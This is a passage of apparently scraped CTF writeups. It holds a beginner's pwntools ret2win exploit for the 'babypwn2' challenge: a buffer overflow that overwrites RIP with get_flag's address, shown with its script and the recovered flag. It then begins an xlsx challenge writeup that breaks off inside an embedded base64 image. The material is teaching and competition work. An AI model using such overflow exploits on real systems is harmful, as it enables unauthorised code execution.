I recommend beginners who solve these challenges without pwntools to try and switch to pwntools because it is much easier! ```pyfrom pwn import *import pwnlib.util.packing as pack elf = ELF("./babypwn2")context.binary = elfcontext.log_level = "DEBUG"context(terminal=["tmux","split-window", "-h"]) # p = process('./babypwn2')# gdb.attach(p) p = remote('babypwn2.wolvctf.io', 1337) ### IGNORE EVERYTHING ABOVE # FIND RIP offset# p.sendlineafter(b'>> ', cyclic(1024)) winaddr = elf.symbols['get_flag']offset = cyclic_find('kaaalaaa') p.sendlineafter(b'>> ', b'A'*offset + pack.p64(winaddr)) p.interactive()``` First, we can find the offset of the RIP on the stack comapred to where the input is. We can do this by sending a cyclic of length 1024 (arbitrarily large). I'll skip over the fine details, but, essentially, you can think of the cyclic() function generates a sequence of characters such that every group of 4 characters will be unique. When the program inveitably throws a segmentation fault, once the RIP is overriden and it can't find the corresponding function since it is a random address, we can find the 8 characters it attempted to return to by checking the bytes at RSP, the stack pointer (points to the top of the stack). (Note that it is 8 instead of 4 because this is a 64-bit ELF, instead of a 32-bit ELF). If you're using standard GDB, we can do this by the command `x/qx $rsp`. I'm personally using pwndbg (and I would recommend you do so too!), which allows me to see all registers everytime the program stops. With pwndbg, we can clearly see that it's `kaaalaaa` (or by decoding from hex to ASCII from what you read in standard GDB). Now that we know this, we can use pwntools's `cyclic_find()` function to find the offset of this string in the generated cycle. Once we do that, we can simply find the address of the get_flag() function as seen above, then send some garbage bytes to fill the bytes in between the input and the RIP, and then send the packed value of the win address (because little-endianness requires us to send the reverse of the bytes). That's it. Running the program will now get you the flag! wctf{Wo4h_l0ok_4t_y0u_h4ck1ng_m3} ### SidenoteIt is usually also standard to run `checksec` on the ELF, but I left it out since this is a writeup intended for beginners. This is a very useful tool for pwners, so if you're a beginner, I would recommend downloading it!
This was a pretty simple challenge. We are given an xlsx with a huge number of cells with the fake flag format `fake_flag\d`. ![1](data:image/png;base64,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